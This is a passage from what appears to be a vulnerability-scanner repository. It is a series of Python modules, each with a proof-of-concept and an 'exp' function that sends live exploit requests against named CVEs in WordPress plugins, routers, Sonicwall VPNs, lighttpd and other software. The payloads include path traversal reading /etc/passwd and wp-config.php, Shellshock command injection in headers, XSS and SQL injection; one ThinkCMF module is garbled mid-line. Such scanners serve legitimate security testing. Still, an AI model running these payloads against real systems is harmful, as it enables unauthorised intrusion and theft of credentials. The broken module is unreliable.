| # Exploit, can be same with poc() 60 | def exp(url): 61 | return poc(url) 62 | 63 | 64 | # Utils 65 | def format_url(url): 66 | url = url.strip() 67 | if not ( url.startswith('http://') or url.startswith('https://') ): 68 | url = 'http://' + url 69 | url = url.rstrip('/') 70 | 71 | return url -------------------------------------------------------------------------------- /modules/cves/2013/CVE-2013-5979.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Xibo 1.2.2/1.4.1 - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/26955", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2013-5979", 14 | "https://www.cvedetails.com/cve/CVE-2013-5979", 15 | "https://bugs.launchpad.net/xibo/+bug/1093967" 16 | ], 17 | "classification": { 18 | "cvss-metrics": "", 19 | "cvss-score": "", 20 | "cve-id": "CVE-2013-5979", 21 | "cwe-id": "" 22 | }, 23 | "metadata":{ 24 | "vuln-target": "", 25 | 26 | }, 27 | "tags": ["cve", "cve2013", "lfi"], 28 | } 29 | 30 | 31 | # Vender Fingerprint 32 | def fingerprint(url): 33 | return True 34 | 35 | # Proof of Concept 36 | def poc(url): 37 | result = {} 38 | try: 39 | url = format_url(url) 40 | path = '/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828' 41 | 42 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 43 | if resp.status_code == 200 and "root:" in resp.text: 44 | result["success"] = True 45 | result["info"] = info() 46 | result["payload"] = url+path 47 | 48 | except: 49 | result["success"] = False 50 | 51 | return result 52 | 53 | 54 | # Exploit, can be same with poc() 55 | def exp(url): 56 | return poc(url) 57 | 58 | 59 | # Utils 60 | def format_url(url): 61 | url = url.strip() 62 | if not ( url.startswith('http://') or url.startswith('https://') ): 63 | url = 'http://' + url 64 | url = url.rstrip('/') 65 | 66 | return url -------------------------------------------------------------------------------- /modules/cves/2018/CVE-2018-7719.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Acrolinx Server Directory Traversal''', 9 | "description": '''Acrolinux Server versions prior to 5.2.5 suffer from a directory traversal vulnerability.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html", 13 | "https://www.cvedetails.com/cve/CVE-2018-7719" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2018-7719", 19 | "cwe-id": "CWE-22" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2018", "acrolinx", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini""" 40 | method = "GET" 41 | data = """""" 42 | headers = {} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""bit app support""" in resp0.text and """fonts""" in resp0.text and """extensions""" in resp0.text): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2013/CVE-2013-4117.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting''', 9 | "description": '''A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2013-4117" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2013-4117", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2013", "wordpress", "xss", "wp-plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers['content-type']): 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/visual-tools-dvr-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)''', 9 | "description": '''vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device.''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/50098" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["visualtools", "rce", "oast", "injection"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/cgi-bin/slogin/login.py""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Accept': '*/*', 'User-Agent': '() { :; }; echo ; echo ; /bin/cat /etc/passwd'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/thinkcmf/thinkcmf-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''ThinkCMF RCE''', 9 | "description": '''''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://www.freebuf.com/vuls/217586.html" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["thinkcmf", "rce"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/index.php?a=fetch&content={{url_encode(\'' in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-5471.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Swim Team <= v1.44.10777 - Local File Inclusion''', 9 | "description": '''The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568", 13 | "http://www.vapid.dhs.org/advisory.php?v=134", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2015-5471" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", 18 | "cvss-score": "5.3", 19 | "cve-id": "CVE-2015-5471", 20 | "cwe-id": "CWE-22" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "root:" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/vanguard-post-xss.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Vanguard Marketplace CMS ≤ 2.1''', 9 | "description": '''Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["vanguard", "xss"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/search""" 39 | method = "POST" 40 | data = """phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E""" 41 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""""" in resp0.text) and ("""text/html""" in str(resp0.headers)) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-0554.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure''', 9 | "description": '''The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/35721", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-0554" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "pirelli", "router", "disclosure"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wlsecurity.html' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "var wpapskkey" in resp.text and "var WscDevPin" in resp.text and "var sessionkey" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/sonicwall-sslvpn-shellshock.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Sonicwall SSLVPN ShellShock RCE''', 9 | "description": '''A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://twitter.com/chybeta/status/1353974652540882944", 13 | "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["shellshock", "sonicwall", "rce", "vpn"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/cgi-bin/jarrewrite.sh""" 40 | method = "GET" 41 | data = """""" 42 | headers = {'User-Agent': '"() { :; }; echo ; /bin/bash -c \'cat /etc/passwd\'"', 'Accept': '*/*'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-5461.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | 5 | # Vuln Base Info 6 | def info(): 7 | return { 8 | "author": "cckuailong", 9 | "name": '''StageShow <= 5.0.8 - Open Redirect''', 10 | "description": '''Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.''', 11 | "severity": "medium", 12 | "references": [ 13 | "https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2015-5461" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["redirect", "cve", "cve2015", "wordpress", "wp-plugin"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and re.search(r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$', str(resp.headers)): 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-9414.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)''', 9 | "description": '''The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-9414" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | "cvss-score": "6.1", 18 | "cve-id": "CVE-2015-9414", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2018/CVE-2018-7467.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''AxxonSoft Axxon Next Directory Traversal''', 9 | "description": '''AxxonSoft Axxon Next suffers from a directory traversal vulnerability.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2018-7467" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2018-7467", 19 | "cwe-id": "CWE-200" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2018", "axxonsoft", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """//css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini""" 40 | method = "GET" 41 | data = """""" 42 | headers = {} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""bit app support""" in resp0.text and """fonts""" in resp0.text and """extensions""" in resp0.text): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-2323.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Lighttpd 1.4.34 SQL Injection and Path Traversal''', 9 | "description": '''A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-2323", 13 | "https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt", 14 | "http://www.lighttpd.net/2014/3/12/1.4.35/" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 18 | "cvss-score": "9.8", 19 | "cve-id": "CVE-2014-2323", 20 | "cwe-id": "CWE-89" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "sqli", "lighttpd", "injection"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/etc/passwd' 40 | headers = { 41 | "Host": "[::1]' UNION SELECT '/" 42 | } 43 | 44 | resp = requests.get(url+path, headers=headers, timeout=10, verify=False, allow_redirects=False) 45 | if resp.status_code == 200 and "root:" in resp.text: 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-8799.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin DukaPress 2.5.2 - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-8799", 13 | "https://www.exploit-db.com/exploits/35346", 14 | "https://www.cvedetails.com/cve/CVE-2014-8799" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2014-8799", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "lfi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "DB_NAME" in resp.text and "DB_USER" in resp.text and "DB_PASSWORD" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9607.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Netsweeper 4.0.4 - Cross-Site Scripting''', 9 | "description": '''A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9607" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | "cvss-score": "6.1", 18 | "cve-id": "CVE-2014-9607", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "netsweeper", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9609.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Netsweeper 4.0.8 - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9609" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", 17 | "cvss-score": "5.3", 18 | 